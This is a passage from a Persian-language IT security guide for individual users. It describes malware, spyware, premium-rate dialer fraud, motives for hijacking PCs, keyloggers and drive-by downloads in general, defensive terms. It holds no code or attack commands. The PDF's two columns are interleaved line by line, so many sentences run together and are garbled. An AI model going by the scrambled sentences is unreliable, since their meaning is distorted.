ﺍﺯ ﺁﻧﭽﻪ ﻛﻪ ﻛﺎﺭﺑﺮ ﺍﻧﺘﻈﺎﺭ ﺁﻧﺮﺍ ﺩﺍﺭﺩ ﺍﻧﺠﺎﻡ ﺩﻫـﺪ. ﺑﺮﻧﺎﻣﺔ ﺩﻳﮕﺮ ﻣﻲﮔـﺮﺩﺩ .ﻭﻗﺘـﻲ ﺁﻥ ﺑﺮﻧﺎﻣـﻪ ﺑـﻪ
ﺍﻳﻦ ﺍﺻﻄﻼﺡ ﺩﺭ ﺳﺎﻟﻬﺎﻱ ﺍﺧﻴﺮ ﺑﻪ ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ
ﻻ ﺑـﺪﻭﻥ ﻣﺨﺮﺑﻲ ﺍﻃﻼﻕ ﻣﻲﺷـﻮﺩ ﻛـﻪ ﻣﻌﻤـﻮ ﹰ
ﺍﻃﻼﻉ ﻭ ﺍﺟﺎﺯﺓ ﻛﺎﺭﺑﺮ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﻣﻲﺷـﻮﻧﺪ ﻭ 36 Malicious Software
37 Malware
ﺑﻪ ﺟﻤﻊﺁﻭﺭﻱ ﻭ ﺍﺭﺳﺎﻝ ﺍﻃﻼﻋﺎﺕ ﻣﻲﭘﺮﺩﺍﺯﻧﺪ. 38 Computer Worms
39 Computer Trojan Horses
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٧٢
ﺑﺮﻧﺎﻣﺔ ﺧﺎﺻـﻲ ﺭﺍ ﺁﻏـﺎﺯ ﻣـﻲﻛﻨﻴـﺪ ﺑـﻪ ﺍﺟـﺮﺍ ﺩﺭ ﻣـﻲﺁﻳـﺪ .ﺗﻨﻬـﺎ ﺁﻥ ﺩﺭ ﭼﺎﭖ ﻭ ﻳﺎ ﺍﺭﺳﺎﻝ ﻧﺎﻣﻪﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ ،ﺁﻥ ﻫـﻢ ﻣﻤﻜـﻦ
ﻣﺤﺪﻭﺩﻳﺘﻲ ﻛﻪ ﻋﻤﻠﻜﺮﺩ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫـﺎ ﻣـﻲﺗﻮﺍﻧـﺪ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ ﺍﺳﺖ ﺑﻜﺎﺭ ﻣﻬﺎﺟﻤﺎﻥ ﺑﻴﺎﻳﺪ .ﺟﻤﻊﺁﻭﺭﻱ ﺍﻳﻦ ﺑﺴﺘﻪ ﻫﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ
ﺗﺼﻮﺭﺍﺕ ﻭ ﻣﻬﺎﺭﺕ ﭘﺪﻳﺪﺁﻭﺭﻧﺪﺓ ﺁﻧﻬﺎ ﺍﺳﺖ. ﺩﺭ ﻛﻨﺎﺭ ﻫﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻢ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺭﺍ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩ ﻛﻪ
ﺑﺘﻮﺍﻧﺪ ﺍﺯ ﻫﻮﻳﺖ ﺷﻤﺎ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨـﺪ .ﺍﮔـﺮ ﺩﺭ ﻳـﻚ ﺷـﺮﻛﺖ
٤٨
ﻧﺮﻡﺍﻓﺰﺍﺭ ﺭﺩﻳﺎﺑﻲ ﻭ ﺍﻋﻤﺎﻝ ﺗﻐﻴﻴﺮ ﺩﺭ ﺷﺒﻜﻪ ﺗﺠﺎﺭﻱ ﻛﺎﺭ ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﺷﻤﺎﺭﻩﻫﺎﻱ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺍﻓﺮﺍﺩ ﺩﻳﮕـﺮ
ﺍﻳﻦ ﺩﺳﺘﻪ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎ ﭘﺎﻳﮕﺎﻫﻬﺎﻳﻲ ﻛﻪ ﺷﻤﺎ ﻣﺸﺎﻫﺪﻩ ﻣﻲﻛﻨﻴـﺪ ﺭﺍ ﺭﺍ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺫﺧﻴﺮﻩ ﻣﻲ ﻧﻤﺎﻳﻴﺪ ،ﺩﺭﺻﻮﺭﺕ ﺩﺯﺩﻳـﺪﻩ ﺷـﺪﻥ
ﻧﻈﺎﺭﻩ ﻣﻲﻛﻨﻨﺪ ﻭ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻋﻼﻭﻩ ﺑﺮ ﺁﻧﭽﻪ ﻛـﻪ ﺷـﻤﺎ ﺩﺭ ﺣﺎﻟـﺖ ﺍﻳﻦ ﺷﻤﺎﺭﻩﻫﺎ ﻣﺸﻜﻼﺕ ﺟﺪﻱ ﺑﺮﺍﻳﺘﺎﻥ ﭘﻴﺶ ﺧﻮﺍﻫﺪ ﺁﻣﺪ.
ﺑﺨﺶ ﺩﻭﻡ
ﺭﻭﻱ ﺻﻔﺤﺔ ﻭﺏ ﺍﻳﻤﻦ ﻭﺍﺭﺩ ﻛﻨﻴﺪ )ﻳﻌﻨﻲ ﺍﮔﺮ ﻫﻨﮕﺎﻡ ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋـﺎﺕ ﻛﺎﺭﺑﺮ ﺭﺍﻩ ﺩﻭﺭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﻛﻨﺘﺮﻝ ﻛﺎﻣﻞ ﭘﻴﺪﺍ
ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺷـﻮﺩ( ،ﺍﻳـﻦ ﺑﺮﻧﺎﻣـﻪ ﺩﻗﻴﻘـﹰﺎ ﺁﻧﭽـﻪ ﻛـﻪ ﺗﺎﻳـﭗ ﻛﺮﺩﻩ ﺑﺎﺷﺪ .ﺣﺘﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻳﻦ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎ ﺍﮔـﺮ ﺑﺨﻮﺍﻫﻨـﺪ،
ﻣﻲﻛﻨﻴﺪ ﺭﺍ -ﺑﺼﻮﺭﺕ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻧﺸﺪﻩ -ﺛﺒﺖ ﻣﻲﻧﻤﺎﻳﺪ. ﺑﺘﻮﺍﻧﻨﺪ ﺷﻤﺎ ﺭﺍ ﺍﺯ ﺍﺩﺍﻣﺔ ﻛﺎﺭﺗﺎﻥ ﺑﺎﺯﺩﺍﺭﻧﺪ .ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﺭﺍﻳﺎﻧﺔ ﺷـﻤﺎ
ﺗﺤﺖ ﻓﺮﻣﺎﻥ ﺷﺨﺺ ﺩﻳﮕﺮﻱ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﻭ ﺷـﻤﺎ ﺍﺯ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ
ﺳﺮﻗﺖ ﻣﺎﻟﻲ ﺁﮔﺎﻫﻲ ﻧﺪﺍﺭﻳﺪ .ﺍﻣﺎ ﺳﺆﺍﻟﻲ ﻛﻪ ﭘﻴﺶ ﻣﻲﺁﻳﺪ ﺍﻳﻦ ﺍﺳـﺖ ﻛـﻪ ﭼـﺮﺍ
ﺩﺭ ﺍﻛﺜﺮ ﺳﺮﻗﺘﻬﺎﻳﻲ ﻛﻪ ﺩﺭﻧﺘﻴﺠﺔ ﺣﻤﻼﺕ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﻣﻬﺎﺟﻢ ﻣﺎﻳﻞ ﺍﺳﺖ ﻛﻨﺘﺮﻝ ﺳﻴـﺴﺘﻢ ﺷـﻤﺎ ﺭﺍ ﺩﺭ ﺩﺳـﺖ ﺑﮕﻴـﺮﺩ؟
ﺍﺗﻔﺎﻕ ﺍﻓﺘﺎﺩﻩﺍﻧﺪ ،ﺍﺯ ﺭﺍﻳﺎﻧﺔ ﻗﺮﺑﺎﻧﻲ ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ ﺻﻮﺭﺕ ﮔﺮﻓﺘﻪ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻣﻲﺗﻮﺍﻧﺪ ﺩﻻﻳﻞ ﻣﺘﻌـﺪﺩﻱ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ ،ﺍﺯ ﺟﻤﻠـﻪ
ﺍﺳﺖ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﻣﻮﺍﺭﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻨﻜﻪ:
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺳﺮﺑﺎﺭ ،ﭘﻮﻝ ﻣﺴﺮﻭﻗﻪ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛـﺎﺭ ﺑـﻪ ﻣـﺼﺮﻑ ﻫﻴﭻ ﺩﻟﻴﻠﻲ ﻏﻴﺮ ﺍﺯ ﺍﺛﺒﺎﺕ ﺗﻮﺍﻧﺎﻳﻲ ﺧﻮﺩ ﺑﻪ ﺩﻭﺳﺘﺎﻧﺶ ﺑﺮﺍﻱ •
ﺭﺳﻴﺪﻩ ﺍﺳﺖ .ﺳﺎﺩﻩﺗﺮﻳﻦ ﻣﺜﺎﻝ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﺮﻧﺎﻣﻪ ،ﻳـﻚ ﻣـﻮﺩﻡ ﺍﻧﺠﺎﻡ ﺍﻳﻦ ﻛﺎﺭ ﻭﺟﻮﺩ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ؛
ﺭﺍ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﺪ ﻭ ﺍﺯ ﺁﻥ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺱ
ﺑﻄﻮﺭ ﻛﻠﻲ ﺑﺨﻮﺍﻫﺪ ﺗﺨﺮﻳﺒﮕﺮ ﺑﺎﺷﺪ؛ •
ﺑﺎ ﻣﻘﺎﺻﺪ ﺩﻭﺭﺩﺳﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﺪ .ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺑﺮﻧﺎﻣﻪ ﻧﻤﻲﺗﻮﺍﻧـﺪ
ﺻﺤﺒﺖ ﻛﻨﺪ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻢ ﻫﻴﭻ ﻣﺰﻳﺘﻲ ﻧﺪﺍﺭﺩ ،ﺑﺠـﺰ ﺑﺮﺍﻱ ﻫﺪﻑ ﻗﺮﺍﺭ ﺩﺍﺩﻥ ﺷﻤﺎ ﺩﻟﻴﻞ ﺷﺨﺼﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ؛ •
ﻧﻮﻋﻲ ﺍﺣﺴﺎﺱ ﺭﺿﺎﻳﺖ ﺷﻴﻄﺎﻧﻲ ﻣﺒﻨﻲ ﺑﺮ ﺍﻳﻨﻜﻪ ﺷـﻤﺎ ﺩﺭ ﭘﺎﻳـﺎﻥ ﺍﺯ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺑﺮﺍﻱ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﻣﺨـﺮﺏ ﺩﻳﮕـﺮ ﺍﺳـﺘﻔﺎﺩﻩ •
ﻣﺎﻩ ﻳﻚ ﺻﻮﺭﺗﺤﺴﺎﺏ ﺳـﻨﮕﻴﻦ ﺍﺯ ﺷـﺮﻛﺖ ﻣﺨـﺎﺑﺮﺍﺕ ﺩﺭﻳﺎﻓـﺖ ﻛﻨﺪ؛ ﻣﺜﻞ ﻓﺮﺳﺘﺎﺩﻥ ﻫﺮﺯﻧﺎﻣﻪ ﻳـﺎ ﺍﻧﺠـﺎﻡ ﺣﻤﻠـﺔ ﺗﺨﺮﻳـﺐ
ﻣﻲﻛﻨﻴﺪ. ﺳﺮﻭﻳﺲ ) ٥٢(DoSﻋﻠﻴﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ؛ ﻭ ﻳﺎ ﺍﻳﻨﻜﻪ
ﺩﺭ ﻣﻮﺍﺭﺩ ﺩﻳﮕﺮ ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺑﻬـﺮﺓ ﺷﺨـﺼﻲ ﺑﺨﻮﺍﻫﺪ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﺍﺭﺯﺷﻲ ﺭﺍ ﺑﻪ ﺳﺮﻗﺖ ﺑﺒﺮﺩ. •
ﺑﺒﺮﺩ .ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﻤﺎﺭﻩ ﺗﻠﻔـﻦ ﺧﺎﺻـﻲ
ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﻭﻗﺘﻲ ﺑﺎ ﺁﻥ ﺗﻤﺎﺱ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﺩ ﺷﺮﻛﺖ ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻴﺪ ﻧـﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻳﻲ ﺑـﺎ ﻛـﺎﺭﺑﺮﺩ ﻣـﺸﺎﺑﻪ ﺗﺤـﺖ
ﻣﺨﺎﺑﺮﺍﺕ ﺩﺭ ﻫﺮ ﺩﻗﻴﻘﻪ ﻫﺰﻳﻨﺔ ﺑﻴﺸﺘﺮﻱ ﺑﺮﺍﻱ ﺗﻤﺎﺱ ﮔﻴﺮﻧﺪﻩ ﺛﺒﺖ ﻋﻨــﺎﻭﻳﻨﻲ ﭼــﻮﻥ ﺍﺑﺰﺍﺭﻫــﺎﻱ ﺩﺳﺘﺮﺳــﻲ ﺭﺍﻩ ﺩﻭﺭ ٥٣ﻳــﺎ ﺍﺑﺰﺍﺭﻫــﺎﻱ
ﻛﻨﺪ ﻭ ﺩﺭ ﻋﻮﺽ ﻣﻘﺪﺍﺭﻱ ﺍﺯ ﺍﻳﻦ ﻫﺰﻳﻨﻪ ﺑﻪ ﺣﺴﺎﺏ ﻛـﺴﻲ ﺑـﺮﻭﺩ ﺭﺍﻫﺒﺮﻱ ﺭﺍﻩ ﺩﻭﺭ ٥٤ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺸﺮﻭﻉ ﻭ ﺑـﺴﻴﺎﺭ ﻭ ﭘﺮﺍﺳـﺘﻔﺎﺩﻩﺍﻱ
ﻛﻪ ﺑﺎ ﺍﻭ ﺗﻤﺎﺱ ﺣﺎﺻﻞ ﺷﺪﻩ ﺍﺳﺖ .ﺍﻳﻦ ﺍﻣـﺮ ﺩﺭ ﺍﻧـﻮﺍﻉ ﻣﺨﺘﻠـﻒ ﻫﺴﺘﻨﺪ .ﺍﮔﺮ ﺍﺯ ﺍﻳﻦ ﺍﺑﺰﺍﺭﻫﺎ ﺑﺮﺍﻱ ﺍﻫـﺪﺍﻑ ﻛـﺎﺭﻱ ﺧـﻮﺩ ﺍﺳـﺘﻔﺎﺩﻩ
ﻣﻌﺎﻣﻼﺕ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ ،ﺍﻣﺎ ﺑﻴﺸﺘﺮ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﺓ ﻣﻲﻛﻨﻴﺪ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻣﻼﺣﻈﺎﺕ ﻣﻨﺎﺳﺐ ﺍﻣﻨﻴﺘﻲ ﻣﺎﻧﻨﺪ ﻧـﺎﻡ
ﺷﺮﻛﺘﻬﺎﻱ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﺍﺳﺖ ﻛﻪ ﺧﻮﺍﻫﺎﻥ ﺭﺍﻩ ﺳﺎﺩﻩﺍﻱ ﻫﺴﺘﻨﺪ ﺗـﺎ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﺍ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪﺍﻳﺪ.
ﺑﺮﺍﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺑﺪﻭﻥ ﺿﻤﺎﻧﺖ ﻫﺰﻳﻨﻪﺍﻱ ﺭﺍ ﺍﺯ ﺣﺴﺎﺏ ﺷﻤﺎ ﻛـﺴﺮ ٥٥
ﺛﺒﺖﻛﻨﻨﺪﻩﻫﺎﻱ ﻛﻠﻴﺪ
ﻧﻤﺎﻳﻨــﺪ .ﺩﺭ ﭼﻨــﻴﻦ ﻭﺿــﻌﻴﺘﻲ ﺷــﺮﻛﺖ ﻣﺨــﺎﺑﺮﺍﺕ ﻫﺰﻳﻨــﻪﻫــﺎﻱ
ﺗﻤﺎﺱ ﮔﻴﺮﻧﺪﻩ ﻫﺎ ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﻣﺤﺎﺳﺒﻪ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﻗﺴﻤﺘﻲ ﻣﻔﻬﻮﻡ "ﺛﺒﺖﻛﻨﻨﺪﻩ ﻛﻠﻴﺪ" ﺍﺯ ﻧﺎﻡ ﺁﻥ ﻣﺸﺨﺺ ﺍﺳﺖ .ﺁﻧﻬﺎ ﺗﻤـﺎﻣﻲ
ﺍﺯ ﺁﻧﺮﺍ ﺑﻌﻨﻮﺍﻥ ﻫﺰﻳﻨﺔ ﺗﻤﺎﺳﻬﺎﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺑﻪ ﺷﺮﻛﺘﻲ ﻛـﻪ ﺑـﺎ ﺁﻥ ﻛﻠﻴﺪﻫﺎﻱ ﻓﺸﺮﺩﻩ ﺷﺪﺓ ﺻـﻔﺤﻪﻛﻠﻴـﺪ ﺭﺍ ﺛﺒـﺖ ﻭ ﺩﺭ ﻳـﻚ ﻓﺎﻳـﻞ
ﺗﻤﺎﺱ ﺣﺎﺻﻞ ﺷـﺪﻩ ﺍﺳـﺖ ﺍﺭﺳـﺎﻝ ﻛﻨـﺪ .ﺍﮔـﺮ ﻧﻔـﻮﺫﮔﺮ ﭼﻨـﻴﻦ ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﻨﺪ .ﺍﻳﻦ ﻓﺎﻳﻞ ﻣﻲﺗﻮﺍﻧـﺪ ﺩﺭ ﺁﻳﻨـﺪﻩ ﺑـﺎ ﺩﺳﺘﺮﺳـﻲ ﺍﺯ
ﺷﻤﺎﺭﻩﺍﻱ ﺩﺍﺷﺘﻪﺑﺎﺷﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺭﺍ ﻃﻮﺭﻱ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻃﺮﻳﻖ ﺩﺭﺏ ﻣﺨﻔﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﺑﮕﻴـﺮﺩ ﻭ ﻳـﺎ ﺍﺯ ﻃﺮﻳـﻖ
ﻛﻨﺪ ﻛﻪ ﺑﺎ ﺍﻳﻦ ﺷﻤﺎﺭﻩ ﺗﻤﺎﺱ ﺑﮕﻴـﺮﺩ ﻭ ﺑـﺮﺍﻱ ﻣـﺪﺗﻲ ﺗﻤـﺎﺱ ﺭﺍ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻳﺎ ﻭﺏ ﺑﺮﺍﻱ ﻧﻮﻳﺴﻨﺪﺓ ﺑﺮﻧﺎﻣﻪ ﺍﺭﺳﺎﻝ ﮔﺮﺩﺩ.
ﺑﺮﻗﺮﺍﺭ ﻧﮕﻬﺪﺍﺭﺩ .ﺩﺭ ﺁﻧﺼﻮﺭﺕ ﺍﻳﻦ ﻫﺰﻳﻨﻪ ﺩﺭ ﺻﻮﺭﺗﺤﺴﺎﺏ ﭘﺎﻳـﺎﻥ ﺷﺎﻳﺎﻥ ﺫﻛﺮ ﺍﺳﺖ ﻛﻪ ﺛﺒﺖﻛﻨﻨﺪﻩ ﻛﻠﻴﺪ ﺗﻤـﺎﻣﻲ ﺁﻧﭽـﻪ ﻛـﻪ ﻭﺍﻗﻌـﹰﺎ
ﻣﺎﻩ ﺗﻠﻔﻦ ﺷﻤﺎ ﺩﺭﺝ ﺧﻮﺍﻫﺪ ﺷﺪ. ﺗﺎﻳﭗ ﻣﻲﻛﻨﻴﺪ ﺭﺍ ﻧﻈﺎﺭﻩ ﻣﻲﻛﻨﺪ ﻭ ﻧﻪ ﺁﻧﭽﻪ ﻛﻪ ﺍﺯ ﻃﺮﻳـﻖ ﺷـﺒﻜﻪ
ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﺩ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﺣﺘﻲ ﺍﮔـﺮ ﺷـﻤﺎﺭﺓ ﻛـﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ ﺭﺍ
ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﭼﮕﻮﻧﻪ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲﺷﻮﻧﺪ؟
ﭼﻨﺪ ﺳﺎﻝ ﻗﺒﻞ ﺗﻨﻬﺎ ﺭﺍﻩ ﺁﻟﻮﺩﻩ ﺷﺪﻥ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺑﻮﺳـﻴﻠﺔ 52 Denial of Service Attack
ﻭﻳﺮﻭﺱ ﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ،ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺩﻳـﺴﻜﻬﺎﻱ ﺁﻟـﻮﺩﻩ 53 Remote Access Tools
54 Remote Administration Tools
55 Keyloggers
٧٥ ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﺩﻭﻣﻴﻦ ﺗﻐﻴﻴﺮ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﭼـﻮﻥ ﺗـﻼﺵ ﺑـﺮ ﺍﻳـﻦ ﺑـﻮﺩﻩ ﻛـﻪ ﺑﻮﺩ ﻭ ﺍﮔﺮ ﺑﺎ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺁﻟﻮﺩﻩ ﺷﺪﻩ ﺑﻮﺩﻧـﺪ ﺗﺒـﺎﺩﻝ ﻓﺎﻳـﻞ ﺍﻧﺠـﺎﻡ
ﻧﺮﻡﺍﻓﺰﺍﺭ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺳﺎﺩﻩ ﻭ ﻗﻮﻱﺗﺮ ﮔﺮﺩﺩ ،ﺍﻣﺮﻭﺯ ﺍﻣﻜـﺎﻥ ﻧﻤﻲﺩﺍﺩﻳﺪ ﺩﺭ ﺍﻣﻨﻴﺖ ﺑـﻪ ﺳـﺮ ﻣـﻲﺑﺮﺩﻳـﺪ .ﺳﻴـﺴﺘﻤﻬﺎﻱ UNIX
ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ HTMLﺩﺭ ﺑﺪﻧﺔ ﺍﺻﻠﻲ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻭﺟـﻮﺩ ﭼﻨﺪﺍﻥ ﻣﺴﺘﻌﺪ ﺩﺭﻳﺎﻓﺖ ﻭﻳﺮﻭﺱ ﻧﺒﻮﺩﻧﺪ ﺍﻣﺎ ﺑﻪ ﺩﻟﻴـﻞ ﻗﺎﺑﻠﻴﺘﻬـﺎﻱ
ﺩﺍﺭﺩ؛ ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ HTMLﻣﻲﺗﻮﺍﻧﺪ ﺣـﺎﻭﻱ ﺩﺳـﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻱ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒـﺎﻁ ﻭ ﻫﻤﭽﻨـﻴﻦ ﺍﺷـﻜﺎﻻﺕ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ
ﻣﺸﻜﻠﺴﺎﺯ ﺑﺎﺷﺪ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ HTMLﻣﻲﺗﻮﺍﻧﺪ ﻣﺮﻭﺭﮔـﺮ ﻭﺏ ﺭﺍ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭ ﺑﺮﺧﻲ ﺍﺯ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺭﺍﻳﺞ ،ﺣﺘﻲ ﺩﺭ
ﺏ ﺍﺯ ﭘﻴﺶ ﺗﻌﻴـﻴﻦﺷـﺪﻩﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﺑﻪ ﺳﻤﺖ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭ ﹺ ﺁﻥ ﺭﻭﺯﻫﺎ ﻫﻢ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻧﻔﻮﺫﮔﺮﺍﻥ ﻣﻲﺗﻮﺍﻧﺴﺘﻨﺪ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎ
ﻫﺪﺍﻳﺖ ﻛﻨﺪ ﻛﻪ ﺷﺎﻳﺪ ﺑﺮﺍﻱ ﺷﻤﺎ ﻳﺎ ﻓﺮﺯﻧﺪﺍﻧﺘﺎﻥ ﻣﻨﺎﺳﺐ ﻧﺒﺎﺷﺪ. ﺩﺳﺘﻴﺎﺑﻲ ﭘﻴﺪﺍ ﻛﻨﻨﺪ ﻭ ﺭﻭﻱ ﺁﻧﻬﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺩﺭﺏ ﻣﺨﻔﻲ ﻧﺼﺐ
ﻧﻤﺎﻳﻨﺪ .ﺍﻭﻟﻴﻦ ﺣﺎﺩﺛﺔ ﺟﺪﻱ ﺍﻣﻨﻴﺘﻲ ﺍﻳﻨﺘﺮﻧﺖ ﻛﺮﻣـﻲ ﺑـﻮﺩ ﻛـﻪ ﺩﺭ
ﺑﺨﺶ ﺩﻭﻡ
٦٠
ﻫﺪﺍﻳﺖ ﺑﻮﺳﻴﻠﺔ downloadﻫﺎ ﺍﺯ ﺩﺍﺧﻞ ﺑﺮﻧﺎﻣﺔ ﺍﺻـﻠﻲ ﺭﺍ ﻣـﻲ ﺩﻫﻨـﺪ .ﻧﻤﻮﻧـﺔ ﺭﺍﻳـﺞ ﺁﻥ ﺑﺮﻧﺎﻣـﺔ
" "Adobe Acrobat Readerﺍﺳـﺖ ﻛـﻪ ﺑـﻪ ﺷـﻤﺎ ﺍﺟـﺎﺯﻩ
"ﻫﺪﺍﻳﺖ ﺑﻮﺳﻴﻠﻪ downloadﻫﺎ" ﺯﻣﺎﻧﻲ ﺭﺥ ﻣﻲﺩﻫﺪ ﻛﻪ ﺑﻪ ﻳﻚ
ﻣﻲﺩﻫﺪ ﻫﻨﮕﺎﻡ ﻣـﺮﻭﺭ ﻭﺏ ،ﻓﺎﻳﻠﻬـﺎﻱ PDFﺭﺍ ﻣـﺸﺎﻫﺪﻩ ﻛﻨﻴـﺪ.
ﭘﺎﻳﮕــﺎﻩ ﻭﺏ ﻣﺮﺍﺟﻌــﻪ ﻣــﻲﻛﻨﻴــﺪ ﻭ ﺑﺮﻧﺎﻣــﻪ HTMLﻣﻮﺟــﻮﺩ ﺩﺭ
ﻫﻨﮕﺎﻣﻴﻜــﻪ plug-inﻫــﺎ ﻳــﺎ add-onﻫــﺎ ﻧــﺼﺐ ﻣــﻲﺷــﻮﻧﺪ
ﺻﻔﺤﻪ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﻳـﻚ ﺑﺮﻧﺎﻣـﺔ Javaﻳـﺎ ActiveXﺭﺍ
